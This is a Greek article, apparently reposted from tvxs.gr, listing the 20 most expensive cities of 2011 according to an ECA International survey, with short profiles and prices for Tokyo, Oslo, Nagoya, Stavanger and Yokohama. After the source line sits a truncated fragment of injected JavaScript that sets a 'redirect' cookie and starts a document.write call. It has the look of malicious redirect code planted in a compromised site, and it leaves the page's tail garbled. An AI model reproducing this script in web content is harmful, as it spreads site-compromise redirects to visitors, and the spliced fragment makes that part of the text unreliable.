Οι 20 πιο ακριβές πόλεις του κόσμου για το 2011

Και απο τις καλύτερες πόλεις για να ζεις… ας δουμε και τις ακριβές!

Δημοσιεύθηκαν τα αποτελέσματα της νέας έκθεσης ECA International, για τις πιο ακριβές πόλεις του κόσμου για το 2011. Την παράσταση κλέβουν οι πολλές Ευρωπαϊκές πόλεις που βρίσκονται στις υψηλότερες θέσεις, αναδεικνύοντας την ακρίβεια στη Γηραιά Ήπειρο. Αντίθετα, σε παγκόσμια κλίμακα, οι αμερικάνικες πόλεις κατατάσσονται πλέον στις φθηνές, καθώς το αμερικάνικο δολάριο αποδυναμώνεται.

Η συγκεκριμένη έρευνα της διεθνούς εταιρείας ανθρώπινου δυναμικού διεξάγεται κάθε έξι μήνες. Τα αποτελέσματα προκύπτουν από τη σύγκριση των τιμών των τροφίμων και των βασικών αγαθών και υπηρεσιών για τους αλλοδαπούς σε περισσότερα από 400 αστικά κέντρα ανά τον κόσμο.

Αυτό που προκαλεί εντύπωση είναι το γεγονός ότι την πρώτη πεντάδα των ακριβότερων πόλεων συμπληρώνουν πόλεις από δύο και μόνο χώρες. Την Ιαπωνία και την Νορβηγία. Συγκεκριμένα, οι πέντε πιο ακριβές πόλεις στον κόσμο είναι οι εξής:

5η πιο ακριβή πόλη: Γιοκοχάμα, Ιαπωνία
Η μεγαλύτερη πόλη της Ιαπωνίας μετά το Τόκυο. Η πόλη φιλοξενεί πάνω από 300 εταιρείες πληροφορικής, έχει αναπτυσσόμενη βιομηχανία βιοτεχνολογίας και δραστήρια αυτοκινητοβιομηχανία. Ένα γεύμα σε fast food στην Γιοκοχάμα κοστίζει 16,90 δολάρια.

4η πιο ακριβή πόλη: Σταβάνγκερ, Νορβηγία
Έχουν περάσει περισσότερο από 30 χρόνια όταν η κοινότητα ψαράδων Σταβάνγκερ αναπτύχθηκε σε μία από τις μεγαλύτερες πόλεις της Νορβηγίας, ύστερα από την εύρεση πετρελαίου στη Βόρεια Θάλασσα. Πλέον, αποτελεί μία από τους μεγαλύτερους εξαγωγείς πετρελαίου.

3η πιο ακριβή πόλη: Ναγκόγια, Ιαπωνία
Ένα από τα κυριότερα βιομηχανικά και τεχνολογικά κέντρα της Ιαπωνίας. Σε αντίθεση με άλλα μεγάλα αστικά κέντρα της Ιαπωνίας, η Ναγκόγια διατηρεί τους ρυθμούς ανάπτυξης καθώς κατάφερε να μην πληγεί από την παγκόσμια ύφεση. Ένα γρήγορο γεύμα κοστίζει 19 δολάρια.

2η πιο ακριβή πόλη: Όσλο, Νορβηγία

Η πρωτεύουσα της Νορβηγίας, η καρδιά του νορβηγικού εμπορίου, ναυτιλίας και οικονομίας. Μία από τις ακριβότερες πόλεις στον κόσμο επί σειρά ετών. Ένα γρήγορο γεύμα στο Όσλο κοστίζει 45,20 δολάρια.

1η πιο ακριβή πόλη: Τόκυο, Ιαπωνία
Η πρωτεύουσα της Ιαπωνίας, είναι σύμφωνα με την ECA International η πιο ακριβή πόλη στον κόσμο. Παρά το γεγονός ότι ο δείκτης τιμών καταναλωτή στην περιοχή του Τόκυο έχει καθοδική πορεία από το 2009, σύμφωνα με στοιχεία του Γραφείου Στατιστικής της Ιαπωνίας. Τον περασμένο Σεπτέμβριο το ενοίκιο για ένα δυάρι ανερχόταν κατά μέσο όρο στα 4.352 δολάρια τον μήνα.

Την υπόλοιπη 20άδα συμπληρώνουν οι παρακάτω πόλεις:
20. Παρίσι, Γαλλία
19. Λίβερπουλ, Αγγλία
18. Καμπέρα, Αυστραλία
17. Στοκχόλμη, Σουηδία
16. Σύδνεϋ, Αυστραλία
15. Καράκας, Βενεζουέλα
14. Μόσχα, Ρωσσία
13. Ελσίνκι, Φιλανδία
12. Κοπεγχάγη, Δανία
11. Βασιλεία, Ελβετία
10. Βέρνη, Ελβετία
09. Κόμπε, Ιαπωνία
08. Γενεύη, Ελβετία
07. Λουάντα, Αγκόλα
06. Ζυρίχη, Ελβετία

 

πηγή: tvxs.gr
||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply